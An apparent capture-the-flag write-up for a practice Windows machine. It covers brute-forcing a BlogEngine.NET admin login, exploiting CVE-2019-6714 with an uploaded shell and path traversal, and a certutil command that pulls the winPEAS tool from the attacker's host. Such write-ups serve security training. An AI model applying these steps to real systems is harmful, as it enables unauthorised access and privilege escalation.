# Task 1 - Deploy machine

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privesc on Windows

IP : 10.10.2.58

Q: What is the name of the clown on the homepage

A: Pennywise 

# Task 2 - Using Hydra to brute-force a log in

Q: What request type is the website login form using

Right click > View Page Source > `<form method="post"`

A: POST

Q: Gues a username, choose a password and gain dredentials to a suer account



Using BurpSuite Sniper Attack with Seclists common password

Found password `1qaz2wsx`

# Task 3

Blog Engine Version is located in the About tab in the admin dashboard

Login with `admin:1qaz2wsx`

Version `3.3.6.0`

Q: What is the CVE?
blogengine.net is vulnerable to CVE-2019-6714 
`BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution `

Copy the Code from exploit database and paste into a new file called PostView.ascx 

Upload the file to the webapp, where it has the file icon 

nagivate to `<IP>/?theme=../../App_Data/files`

Q: Who is the webserver running as?

Once in the shell, run `whoami`

A: `iis apppool\blog`


# Task 4
q: What is the OS version of this windows Machine 

Run `sysinfo`

Answer: Windows 2012 R2 (6.3 BNBuild 9600)



Let's get WinPeas to enumerate Windows
Download winPEAS.exe from ![this link](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release)

Run a simple HTTP server 

`python -m SImpleHTTPServer 80`

On the shell, nav to C:\Windows\Temp
run `certutil -urlcache -f http://10.6.31.49/winPEAS64.exe winpeas.exe`


run `winpeas.exe`

Found defaulkt username and default password

